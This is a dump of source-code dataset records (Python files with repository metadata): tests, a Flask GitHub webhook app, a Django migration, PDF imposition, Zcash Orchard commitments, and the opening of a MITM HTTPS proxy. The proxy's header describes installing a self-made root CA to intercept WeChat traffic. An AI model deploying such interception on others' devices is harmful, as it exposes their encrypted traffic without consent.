RESULTS_WRITER_PATH
) as mock_wf_writer:
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "file_path"
)
mock_wf_writer.side_effect = mock_file_writer
self.review_task.save_project_as()
self.assertTrue(mock_wf_writer.called)
self.assertTrue(mock_open.called)
self.assertTrue(mock_json_dump.called)
self.assertTrue(mock_file_dialog.called)
def test_save_project_failure(self):
mock_open = mock.mock_open()
mock_open.side_effect = IOError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_error.side_effect = mock_return_args
self.review_task.save_project_as()
self.assertTrue(mock_open.called)
mock_error.assert_called_with(
None,
"Cannot save in the requested file:\n\nOUPS",
"Error when saving the project",
)
def test_open_project(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_LOAD_PATH
) as mock_json, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_json.return_value = {
"analysis_model": {
"header": ["x", "y"],
"1": {'data': [1, 2],
'metadata': {'a': 7}}
},
"version": "1",
"workflow": {},
}
# the workflow gets updated to a new Workflow object
old_workflow = self.review_task.workflow_model
# but the analysis model gets updated in-place
old_analysis = copy.deepcopy(self.review_task.analysis_model)
self.assertEqual(old_workflow, self.setup_task.workflow_model)
with mock.patch(
"force_bdss.io.workflow_reader.WorkflowReader.read"
) as mock_read:
mock_read.side_effect = return_workflow
self.review_task.open_project()
self.assertTrue(mock_open.called)
self.assertTrue(mock_json.called)
self.assertNotEqual(old_workflow, self.review_task.workflow_model)
self.assertNotEqual(
self.setup_task.workflow_model, self.review_task.workflow_model
)
self.assertNotEqual(old_workflow, self.setup_task.workflow_model)
self.assertNotEqual(
old_workflow, self.setup_task.side_pane.workflow_tree.model
)
self.assertNotEqual(
old_analysis.header, self.review_task.analysis_model.header
)
self.assertNotEqual(
old_analysis.header, self.setup_task.analysis_model.header
)
self.assertEqual(
("x", "y"), self.review_task.analysis_model.header
)
self.assertEqual(
[(1, 2)], self.review_task.analysis_model.evaluation_steps,
)
self.assertEqual(
[{'a': 7}], self.review_task.analysis_model.step_metadata
)
self.assertEqual(
self.setup_task.analysis_model.header,
self.review_task.analysis_model.header,
)
self.assertEqual(
self.setup_task.analysis_model.evaluation_steps,
self.review_task.analysis_model.evaluation_steps,
)
def test_open_empty_analysis_model(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_LOAD_PATH
) as mock_json, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_json.return_value = {"version": "1", "workflow": {}}
old_workflow = self.review_task.workflow_model
with mock.patch(
"force_bdss.io.workflow_reader.WorkflowReader.read"
) as mock_read:
mock_read.side_effect = return_workflow
self.review_task.open_project()
self.assertTrue(mock_open.called)
self.assertTrue(mock_json.called)
self.assertIsNot(old_workflow, self.review_task.workflow_model)
self.assertIsNot(
self.setup_task.workflow_model, self.review_task.workflow_model
)
self.assertEqual(tuple(), self.review_task.analysis_model.header)
self.assertEqual(
[], self.review_task.analysis_model.evaluation_steps
)
def test_open_project_failure(self):
mock_open = mock.mock_open()
mock_open.side_effect = IOError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(RESULTS_ERROR_PATH) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
self.assertFalse(self.review_task.open_project())
error_msg = (
"Unable to load file:\n\n[Errno 2] "
"No such file or directory: ''"
)
mock_error.assert_called_with(
None, error_msg, "Error when loading project"
)
mock_open = mock.mock_open()
error = ValueError("some wrong value")
mock_open.side_effect = error
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_ERROR_PATH
) as mock_error, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
self.assertFalse(self.review_task.open_project())
error_msg = f"Unable to load project:\n\n{error}"
mock_error.assert_called_with(
None, error_msg, "Error when loading project"
)
| 12,452
| 32
| 311
|
795b0560d2ca479481ca8ceaeb887fd7b5cba2be
| 9,784
|
py
|
Python
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 37
|
2017-07-10T10:29:52.000Z
|
2019-05-09T01:50:41.000Z
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 13
|
2017-06-13T08:01:30.000Z
|
2018-01-30T12:00:59.000Z
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 4
|
2017-07-05T15:04:09.000Z
|
2017-12-16T20:05:46.000Z
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(sileht): usefull for gunicon, not really for uwsgi
# import gevent
# import gevent.monkey
# gevent.monkey.patch_all()
import hmac
import logging
import os
import flask
import github
import lz4.block
import requests
import rq
import rq_dashboard
import ujson
from pastamaker import config
from pastamaker import utils
from pastamaker import worker
LOG = logging.getLogger(__name__)
app = flask.Flask(__name__)
app.config.from_object(rq_dashboard.default_settings)
app.register_blueprint(rq_dashboard.blueprint, url_prefix="/rq")
app.config["REDIS_URL"] = utils.get_redis_url()
app.config["RQ_POLL_INTERVAL"] = 10000 # ms
@app.route("/auth", methods=["GET"])
@app.route("/refresh/<owner>/<repo>/<path:refresh_ref>",
methods=["POST"])
@app.route("/refresh", methods=["POST"])
@app.route("/queue/<owner>/<repo>/<path:branch>")
@app.route("/status")
@app.route('/status/stream')
@app.route("/event", methods=["POST"])
@app.route("/")
@app.route("/favicon.ico")
@app.route("/fonts/<file>")
@app.route("/login")
@app.route("/logged/<installation_id>")
| 30.767296
| 78
| 0.601799
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(sileht): usefull for gunicon, not really for uwsgi
# import gevent
# import gevent.monkey
# gevent.monkey.patch_all()
import hmac
import logging
import os
import flask
import github
import lz4.block
import requests
import rq
import rq_dashboard
import ujson
from pastamaker import config
from pastamaker import utils
from pastamaker import worker
LOG = logging.getLogger(__name__)
app = flask.Flask(__name__)
app.config.from_object(rq_dashboard.default_settings)
app.register_blueprint(rq_dashboard.blueprint, url_prefix="/rq")
app.config["REDIS_URL"] = utils.get_redis_url()
app.config["RQ_POLL_INTERVAL"] = 10000 # ms
def get_redis():
if not hasattr(flask.g, 'redis'):
conn = utils.get_redis()
flask.g.redis = conn
return flask.g.redis
def get_queue():
if not hasattr(flask.g, 'rq_queue'):
flask.g.rq_queue = rq.Queue(connection=get_redis())
return flask.g.rq_queue
@app.route("/auth", methods=["GET"])
def auth():
return "pastamaker don't need oauth setup"
@app.route("/refresh/<owner>/<repo>/<path:refresh_ref>",
methods=["POST"])
def refresh(owner, repo, refresh_ref):
authentification()
integration = github.GithubIntegration(config.INTEGRATION_ID,
config.PRIVATE_KEY)
installation_id = utils.get_installation_id(integration, owner)
if not installation_id:
flask.abort(404, "%s have not installed pastamaker" % owner)
if refresh_ref == "full":
token = integration.get_access_token(installation_id).token
g = github.Github(token)
r = g.get_repo("%s/%s" % (owner, repo))
pulls = r.get_pulls()
branches = set([p.base.ref for p in pulls])
for branch in branches:
# Mimic the github event format
data = {
'repository': {
'name': repo,
'full_name': '%s/%s' % (owner, repo),
'owner': {'login': owner},
},
'installation': {'id': installation_id},
"refresh_ref": "branch/%s" % branch,
}
get_queue().enqueue(worker.event_handler, "refresh", data)
else:
# Mimic the github event format
data = {
'repository': {
'name': repo,
'full_name': '%s/%s' % (owner, repo),
'owner': {'login': owner},
},
'installation': {'id': installation_id},
"refresh_ref": refresh_ref,
}
get_queue().enqueue(worker.event_handler, "refresh", data)
return "", 202
@app.route("/refresh", methods=["POST"])
def refresh_all():
authentification()
integration = github.GithubIntegration(config.INTEGRATION_ID,
config.PRIVATE_KEY)
counts = [0, 0, 0]
for install in utils.get_installations(integration):
counts[0] += 1
token = integration.get_access_token(install["id"]).token
g = github.Github(token)
i = g.get_installation(install["id"])
for repo in i.get_repos():
counts[1] += 1
pulls = repo.get_pulls()
branches = set([p.base.ref for p in pulls])
# Mimic the github event format
for branch in branches:
counts[2] += 1
get_queue().enqueue(worker.event_handler, "refresh", {
'repository': repo.raw_data,
'installation': {'id': install['id']},
'refresh_ref': "branch/%s" % branch,
})
return ("Updated %s installations, %s repositories, "
"%s branches" % tuple(counts)), 202
@app.route("/queue/<owner>/<repo>/<path:branch>")
def queue(owner, repo, branch):
return get_redis().get("queues~%s~%s~%s" % (owner, repo, branch)) or "[]"
def _get_status(r):
queues = []
for key in r.keys("queues~*~*~*"):
_, owner, repo, branch = key.split("~")
updated_at = None
payload = r.get(key)
if payload:
try:
pulls = ujson.loads(payload)
except Exception:
# Old format
payload = lz4.block.decompress(payload)
pulls = ujson.loads(payload)
updated_at = list(sorted([p["updated_at"] for p in pulls]))[-1]
queues.append({
"owner": owner,
"repo": repo,
"branch": branch,
"pulls": pulls,
"updated_at": updated_at,
})
return ujson.dumps(queues)
@app.route("/status")
def status():
r = get_redis()
return _get_status(r)
def stream_message(_type, data):
return 'event: %s\ndata: %s\n\n' % (_type, data)
def stream_generate():
r = get_redis()
yield stream_message("refresh", _get_status(r))
yield stream_message("rq-refresh", get_queue().count)
pubsub = r.pubsub()
pubsub.subscribe("update")
pubsub.subscribe("rq-update")
while True:
# NOTE(sileht): heroku timeout is 55s, we have set gunicorn timeout to
# 60s, this assume 5s is enough for http and redis round strip and use
# 50s
message = pubsub.get_message(timeout=50.0)
if message is None:
yield stream_message("ping", "{}")
elif message["channel"] == "update":
yield stream_message("refresh", _get_status(r))
yield stream_message("rq-refresh", get_queue().count)
elif message["channel"] == "rq-update":
yield stream_message("rq-refresh", get_queue().count)
@app.route('/status/stream')
def stream():
return flask.Response(flask.stream_with_context(stream_generate()),
mimetype="text/event-stream")
@app.route("/event", methods=["POST"])
def event_handler():
authentification()
event_type = flask.request.headers.get("X-GitHub-Event")
event_id = flask.request.headers.get("X-GitHub-Delivery")
data = flask.request.get_json()
if event_type in ["refresh", "pull_request", "status",
"pull_request_review"]:
get_queue().enqueue(worker.event_handler, event_type, data)
get_redis().publish("rq-update", "noop")
if "repository" in data:
repo_name = data["repository"]["full_name"]
else:
repo_name = data["installation"]["account"]["login"]
LOG.info('[%s/%s] received "%s" event "%s"',
data["installation"]["id"], repo_name,
event_type, event_id)
return "", 202
@app.route("/")
def index():
return app.send_static_file("index.html")
@app.route("/favicon.ico")
def favicon():
return app.send_static_file("favicon.ico")
@app.route("/fonts/<file>")
def fonts(file):
# bootstrap fonts
return flask.send_from_directory(os.path.join("static", "fonts"), file)
def authentification():
# Only SHA1 is supported
header_signature = flask.request.headers.get('X-Hub-Signature')
if header_signature is None:
LOG.warning("Webhook without signature")
flask.abort(403)
try:
sha_name, signature = header_signature.split('=')
except ValueError:
sha_name = None
if sha_name != 'sha1':
LOG.warning("Webhook signature malformed")
flask.abort(403)
mac = utils.compute_hmac(flask.request.data)
if not hmac.compare_digest(mac, str(signature)):
LOG.warning("Webhook signature invalid")
flask.abort(403)
@app.route("/login")
def login():
installation_id = flask.request.args.get('installation_id')
params = {
'client_id': config.OAUTH_CLIENT_ID,
'redirect_uri': "%s/logged/%s" % (config.BASE_URL, installation_id),
'scope': 'repo',
'note': 'Mergify.io PR rebase/merge bot',
'note_url': config.BASE_URL
}
url = "https://github.com/login/oauth/authorize?"
url = url + "&".join("=".join(i) for i in params.items())
return flask.redirect(url, code=302)
@app.route("/logged/<installation_id>")
def logged(installation_id):
code = flask.request.args.get('code')
r = requests.post("https://github.com/login/oauth/access_token",
params=dict(
client_id=config.OAUTH_CLIENT_ID,
client_secret=config.OAUTH_CLIENT_SECRET,
code=code,
), headers={'Accept': 'application/json'})
r.raise_for_status()
token = r.json().get('access_token')
if not token:
return flask.abort(400, 'Invalid callback code')
r = requests.get(
"https://api.github.com/user/installations/%s/repositories" %
installation_id,
headers={"Accept": "application/vnd.github.machine-man-preview+json",
"Authorization": "token %s" % token})
if r.status_code == 403:
return flask.abort(
400, "You don't have the write access on "
"repositories of this %s installation" % config.CONTEXT)
r.raise_for_status()
get_redis().set("installation-token-%s" % installation_id, token)
return "Registration OK"
| 7,672
| 0
| 402
|
3d17e01cc03fb6bd6696eb4b21af15c825c85509
| 426
|
py
|
Python
|
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-08-26 06:57
from django.db import migrations, models
| 22.421053
| 74
| 0.622066
|
# Generated by Django 3.2.6 on 2021-08-26 06:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('watchlist_app', '0002_auto_20210826_0852'),
]
operations = [
migrations.AlterField(
model_name='streamingplatform',
name='about',
field=models.CharField(blank=True, max_length=150, null=True),
),
]
| 0
| 312
| 23
|
70f9fa062d8723acc19d16f3f162787ad7e36d88
| 1,465
|
py
|
Python
|
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
import functools
from spaceone.api.inventory.v1 import network_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.inventory.model.network_model import Network
from spaceone.inventory.info.zone_info import ZoneInfo
from spaceone.inventory.info.region_info import RegionInfo
__all__ = ['NetworkInfo', 'NetworksInfo']
| 38.552632
| 134
| 0.709898
|
import functools
from spaceone.api.inventory.v1 import network_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.inventory.model.network_model import Network
from spaceone.inventory.info.zone_info import ZoneInfo
from spaceone.inventory.info.region_info import RegionInfo
__all__ = ['NetworkInfo', 'NetworksInfo']
def NetworkInfo(network_vo: Network, minimal=False):
info = {
'network_id': network_vo.network_id,
'name': network_vo.name,
'reference': network_pb2.NetworkReference(
**network_vo.reference.to_dict()) if network_vo.reference else None
}
if not minimal:
info.update({
'cidr': network_vo.cidr,
'zone_info': ZoneInfo(network_vo.zone, minimal=True),
'region_info': RegionInfo(network_vo.region, minimal=True),
'created_at': change_timestamp_type(network_vo.created_at),
'data': change_struct_type(network_vo.data),
'metadata': change_struct_type(network_vo.metadata),
'tags': change_struct_type(network_vo.tags),
'collection_info': change_struct_type(network_vo.collection_info.to_dict()),
'domain_id': network_vo.domain_id
})
return network_pb2.NetworkInfo(**info)
def NetworksInfo(network_vos, total_count, **kwargs):
return network_pb2.NetworksInfo(results=list(map(functools.partial(NetworkInfo, **kwargs), network_vos)), total_count=total_count)
| 1,085
| 0
| 46
|
1e2c56644b6e59790a6b681324aa7dd41fa8f75d
| 5,210
|
py
|
Python
|
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | null | null | null |
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | 3
|
2021-09-08T02:23:46.000Z
|
2022-03-12T00:43:59.000Z
|
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | null | null | null |
import sys
import logging
import math
from pathlib import Path
from pydantic import BaseModel
from typing import *
import PyPDF2
from reportlab.lib.units import mm, inch
logging.basicConfig(format='%(asctime)s,%(msecs)d | %(levelname)-8s | %(filename)s:%(funcName)s:%(lineno)d - %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
log = logging.getLogger(__name__)
pt2mm = 0.3527777778
if __name__ == "__main__":
main()
pass
| 32.767296
| 122
| 0.59405
|
import sys
import logging
import math
from pathlib import Path
from pydantic import BaseModel
from typing import *
import PyPDF2
from reportlab.lib.units import mm, inch
logging.basicConfig(format='%(asctime)s,%(msecs)d | %(levelname)-8s | %(filename)s:%(funcName)s:%(lineno)d - %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
log = logging.getLogger(__name__)
pt2mm = 0.3527777778
class Imposition(BaseModel):
substrate_width: float
substrate_height: float
impose_width: Optional[float]
impose_height: Optional[float]
gutter: Optional[int] = 5
pages: Optional[int] = 2
up: Optional[int]
orientation: Optional[str] = "landscape"
amount_x: Optional[int]
amount_y: Optional[int]
def set_orientation(self):
sub_size = [self.substrate_height, self.substrate_width]
if self.orientation == "landscape":
# on landscape width should be larger then height
if not self.substrate_width < self.substrate_height:
sub_size[0] = self.substrate_width
sub_size[1] = self.substrate_height
else:
# if orientation == portrait
if self.substrate_height < self.substrate_width:
sub_size[0] = self.substrate_width
sub_size[1] = self.substrate_height
self.substrate_width = sub_size[0]
self.substrate_height = sub_size[1]
return
def upcalc(self, PDFw, PDFh):
# add gutter to pdf
pdf_gut_w = PDFw + self.gutter
pdf_gut_h = PDFh + self.gutter
# copied from our upcalc-api
subw = self.substrate_width
subh = self.substrate_height
# landscape imposition
landscape_w = math.floor(subw / pdf_gut_w)
landscape_h = math.floor(subh / pdf_gut_h)
landscape_up = math.floor(landscape_w * landscape_h)
# calculate the portrait impose
portrait_w = math.floor(subw / pdf_gut_h)
portrait_h = math.floor(subh / pdf_gut_w)
portrait_up = math.floor(portrait_w * portrait_h)
if landscape_up > portrait_up:
self.orientation = "landscape"
self.amount_x = landscape_w
self.amount_y = landscape_h
self.up = landscape_up
else:
self.orientation = "portrait"
self.amount_x = portrait_w
self.amount_y = portrait_h
self.up = portrait_up
# calc the impose w & height
self.impose_width = self.amount_x * pdf_gut_w
self.impose_height = self.amount_y * pdf_gut_h
# reset the orientation
self.set_orientation()
return
def impose(self, pdfobj):
pdf_writer = PyPDF2.PdfFileWriter()
row_height = (pdfobj.trim_height+self.gutter)*mm # 55mm
single_width = (pdfobj.trim_width+self.gutter)*mm # 85mm
with open("./outfile.pdf", "wb") as pdf_to_write:
for page in range(0, self.pages):
# get the current pdf page
cur_page = pdfobj.pdf_reader.getPage(page)
# make the imposition sheet
impsheet = PyPDF2.pdf.PageObject.createBlankPage(
None, self.impose_width*mm, self.impose_height*mm)
for y in range(0, self.amount_y):
cur_height = row_height*y
for x in range(0, self.amount_x):
impsheet.mergeTranslatedPage(
cur_page, single_width*x, cur_height)
pdf_writer.addPage(impsheet)
pdf_writer.write(pdf_to_write)
return
class PDF(BaseModel):
location: Path
trim_width: Optional[float]
trim_height: Optional[float]
pages: Optional[int] = 2
pdf_handle: Optional[Any]
pdf_reader: Optional[Any]
def __init__(self, **data: Any):
super().__init__(**data)
self.read_pdf()
return
def read_pdf(self):
self.pdf_handle = open(f"{self.location}", "rb")
self.pdf_reader = PyPDF2.PdfFileReader(self.pdf_handle)
self.pages = self.pdf_reader.getNumPages()
# note: this pulls only trimbox info from the first page
trim_width = self.pdf_reader.getPage(0).trimBox.getWidth()
trim_height = self.pdf_reader.getPage(0).trimBox.getHeight()
# cleanup the format
self.trim_width = round(float(trim_width) * pt2mm + 0.001, 2)
self.trim_height = round(float(trim_height) * pt2mm + 0.001, 2)
return
def __del__(self):
self.pdf_handle.close()
return
def main():
pdf = Path(sys.argv[1])
log.debug(f"given pdf: {pdf}")
pdfobj = PDF(location=pdf)
impdata = {
"substrate_width": 460,
"substrate_height": 320,
"pages": pdfobj.pages
}
imp = Imposition(**impdata)
imp.upcalc(PDFw=pdfobj.trim_width, PDFh=pdfobj.trim_height)
imp.impose(pdfobj)
del(pdfobj)
pass
if __name__ == "__main__":
main()
pass
| 3,861
| 787
| 69
|
c4760810a6b30136c57c8727033cf01063f4f5da
| 2,439
|
py
|
Python
|
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
zcash_test_vectors/orchard/commitments.py
|
jarys/zcash-test-vectors
|
0cbb8200b092867606835d641cf65c606d987fd7
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys; assert sys.version_info[0] >= 3, "Python 3 required."
from .group_hash import group_hash
from .pallas import Fp, Scalar
from .sinsemilla import sinsemilla_hash_to_point
from ..utils import i2lebsp
# Commitment schemes used in Orchard https://zips.z.cash/protocol/nu5.pdf#concretecommit
# https://zips.z.cash/protocol/nu5.pdf#constants
L_ORCHARD_BASE = 255
# https://zips.z.cash/protocol/nu5.pdf#concretehomomorphiccommit
# https://zips.z.cash/protocol/nu5.pdf#concretesinsemillacommit
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
# Test consistency of ValueCommit^{Orchard} with precomputed generators
if __name__ == '__main__':
test_value_commit()
| 31.675325
| 107
| 0.707257
|
#!/usr/bin/env python3
import sys; assert sys.version_info[0] >= 3, "Python 3 required."
from .group_hash import group_hash
from .pallas import Fp, Scalar
from .sinsemilla import sinsemilla_hash_to_point
from ..utils import i2lebsp
# Commitment schemes used in Orchard https://zips.z.cash/protocol/nu5.pdf#concretecommit
# https://zips.z.cash/protocol/nu5.pdf#constants
L_ORCHARD_BASE = 255
# https://zips.z.cash/protocol/nu5.pdf#concretehomomorphiccommit
def homomorphic_pedersen_commitment(rcv: Scalar, D, v: Scalar):
return group_hash(D, b"v") * v + group_hash(D, b"r") * rcv
def value_commit(rcv: Scalar, v: Scalar):
return homomorphic_pedersen_commitment(rcv, b"z.cash:Orchard-cv", v)
def rcv_trapdoor(rand):
return Scalar.random(rand)
# https://zips.z.cash/protocol/nu5.pdf#concretesinsemillacommit
def sinsemilla_commit(r: Scalar, D, M):
assert isinstance(r, Scalar)
return sinsemilla_hash_to_point(D + b"-M", M) + (
group_hash(D + b"-r", b"") * r
)
def sinsemilla_short_commit(r: Scalar, D, M):
return sinsemilla_commit(r, D, M).extract()
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
def note_commit(rcm, g_d, pk_d, v, rho, psi):
return sinsemilla_commit(
rcm,
b"z.cash:Orchard-NoteCommit",
g_d + pk_d + i2lebsp(64, v) + i2lebsp(L_ORCHARD_BASE, rho.s) + i2lebsp(L_ORCHARD_BASE, psi.s)
)
def rcm_trapdoor(rand):
return Scalar.random(rand)
# https://zips.z.cash/protocol/nu5.pdf#concreteorchardnotecommit
def commit_ivk(rivk: Scalar, ak: Fp, nk: Fp):
return sinsemilla_short_commit(
rivk,
b"z.cash:Orchard-CommitIvk",
i2lebsp(L_ORCHARD_BASE, ak.s) + i2lebsp(L_ORCHARD_BASE, nk.s)
)
def rivk_trapdoor(rand):
return Scalar.random(rand)
# Test consistency of ValueCommit^{Orchard} with precomputed generators
def test_value_commit():
from random import Random
from ..rand import Rand
from .generators import VALUE_COMMITMENT_RANDOMNESS_BASE, VALUE_COMMITMENT_VALUE_BASE
rng = Random(0xabad533d)
def randbytes(l):
ret = []
while len(ret) < l:
ret.append(rng.randrange(0, 256))
return bytes(ret)
rand = Rand(randbytes)
rcv = rcv_trapdoor(rand)
v = Scalar(100000000)
assert value_commit(rcv, v) == VALUE_COMMITMENT_RANDOMNESS_BASE * rcv + VALUE_COMMITMENT_VALUE_BASE * v
if __name__ == '__main__':
test_value_commit()
| 1,432
| 0
| 225
|
f14389d4d441d9fa654bdded6abebd61ad14e193
| 18,618
|
py
|
Python
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 1,603
|
2018-03-05T03:01:28.000Z
|
2022-03-31T05:30:51.000Z
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 42
|
2018-03-09T03:06:57.000Z
|
2021-12-31T02:30:13.000Z
|
wechatarticles/proxy.py
|
hjyjh/wechat_articles_spider
|
38da6cde565f8d6e09a5822b25b0dcfb1a8cb239
|
[
"Apache-2.0"
] | 491
|
2018-03-05T03:22:31.000Z
|
2022-03-30T10:10:59.000Z
|
# coding:utf-8
import logging
import os
import select
import zlib
import chardet
import time
from http.client import HTTPResponse
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, ParseResult, urlunparse
from tempfile import gettempdir
from ssl import wrap_socket, SSLError
from socket import socket
from OpenSSL.crypto import (
load_certificate,
FILETYPE_PEM,
TYPE_RSA,
PKey,
X509,
X509Extension,
dump_privatekey,
dump_certificate,
load_privatekey,
X509Req,
)
"""
该文件并未项目核心功能,仅作辅助脚本使用
感谢baseproxy项目。原项目地址https://github.com/qiyeboy/BaseProxy,具体详细操作方法请见原项目,步骤简述如下
1. 设置代理,开启服务
2. 下载证书http://baseproxy.ca/,并安装至本机(受信任的根证书颁发机构)
3. 配置完成,每次使用之前开启系统代理即可
为方便使用,在代码上进行了一定的修改,大部分内容来源于,https://github.com/qiyeboy/BaseProxy/blob/master/baseproxy/proxy.py
1. 修改部分函数名,变量名,函数,尽量保持与mitmproxy一致
2. 由于项目主要目的是拦截,并非篡改,增加了对链接过滤功能。若链接不包含相关字符,则不做操作,直接返回。ProxyHandle中的`self.filter_url_lst`
二次引用,若有冒犯原作者之处,敬请指出,将删除该文件。
"""
__all__ = [
"CAAuth",
"ProxyHandle",
"ReqIntercept",
"RspIntercept",
"MitmProxy",
"AsyncMitmProxy",
"Request",
"Response",
]
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
class CAAuth(object):
"""
用于CA证书的生成以及代理证书的自签名
"""
@property
| 29
| 95
| 0.570738
|
# coding:utf-8
import logging
import os
import select
import zlib
import chardet
import time
from http.client import HTTPResponse
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, ParseResult, urlunparse
from tempfile import gettempdir
from ssl import wrap_socket, SSLError
from socket import socket
from OpenSSL.crypto import (
load_certificate,
FILETYPE_PEM,
TYPE_RSA,
PKey,
X509,
X509Extension,
dump_privatekey,
dump_certificate,
load_privatekey,
X509Req,
)
"""
该文件并未项目核心功能,仅作辅助脚本使用
感谢baseproxy项目。原项目地址https://github.com/qiyeboy/BaseProxy,具体详细操作方法请见原项目,步骤简述如下
1. 设置代理,开启服务
2. 下载证书http://baseproxy.ca/,并安装至本机(受信任的根证书颁发机构)
3. 配置完成,每次使用之前开启系统代理即可
为方便使用,在代码上进行了一定的修改,大部分内容来源于,https://github.com/qiyeboy/BaseProxy/blob/master/baseproxy/proxy.py
1. 修改部分函数名,变量名,函数,尽量保持与mitmproxy一致
2. 由于项目主要目的是拦截,并非篡改,增加了对链接过滤功能。若链接不包含相关字符,则不做操作,直接返回。ProxyHandle中的`self.filter_url_lst`
二次引用,若有冒犯原作者之处,敬请指出,将删除该文件。
"""
__all__ = [
"CAAuth",
"ProxyHandle",
"ReqIntercept",
"RspIntercept",
"MitmProxy",
"AsyncMitmProxy",
"Request",
"Response",
]
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
class HttpTransfer(object):
version_dict = {9: "HTTP/0.9", 10: "HTTP/1.0", 11: "HTTP/1.1"}
def __init__(self):
self.hostname = None
self.port = None
